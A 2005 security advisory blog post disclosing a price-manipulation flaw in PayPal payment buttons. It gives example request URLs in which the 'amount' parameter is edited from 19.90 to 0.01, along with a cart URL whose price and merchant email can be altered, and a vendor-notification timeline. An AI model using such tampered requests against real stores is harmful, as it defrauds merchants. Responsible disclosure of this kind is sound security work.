PayPal arbitrary price manipulation

Monday, May 30, 2005
##############################################
PayPal 'butons' price manipulation.
vendor url:https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/
paypal-arbitrary-price-manipulation.html
vendor notify: yes exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################

PayPal buttons are prone to price manipulation.
all stores based on PayPal buttons are posible
vulnerables to this flaw.


##########################
code example of a button
##########################
the proof is based on this form:

https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside

in the exmple of explotation we used "PayPal price manipulation kit " program to shop.
This is Non existent product...

the link of the button for shopping have this url:
(1)
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=19.90&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15


this is the normal price for the product (19.90$) but...
if we change 'amount' variable to 0.01 the product now cost 0.01$

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+ kit&item_number=1&amount=0.01&no_shipping=1&return
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15

another way to exploiting this situation:

(2)
this other example coming from a stored based on paypal:

https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+ kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1¤cy_code=USD

if we look we can change not only the price , we can change the email account
name of product, and other details.
for shopping you need an account on PayPal.

#############
timeline:
#############

discovered: 14 may 2005
vendor notify: 25 may 2005
Vendor response: 26 may 2005
disclosure: 27 may 2005
Public disclosure: 30 may 2005


################### End ####################

thnx to estrella to be my ligth
thnx to icaro he is my support
Thnx to FalconDeOro ... patience.
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!

contact to FalconDeOro
(falcondeoro@gmail.com)
http://falcondeoro.blogspot.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...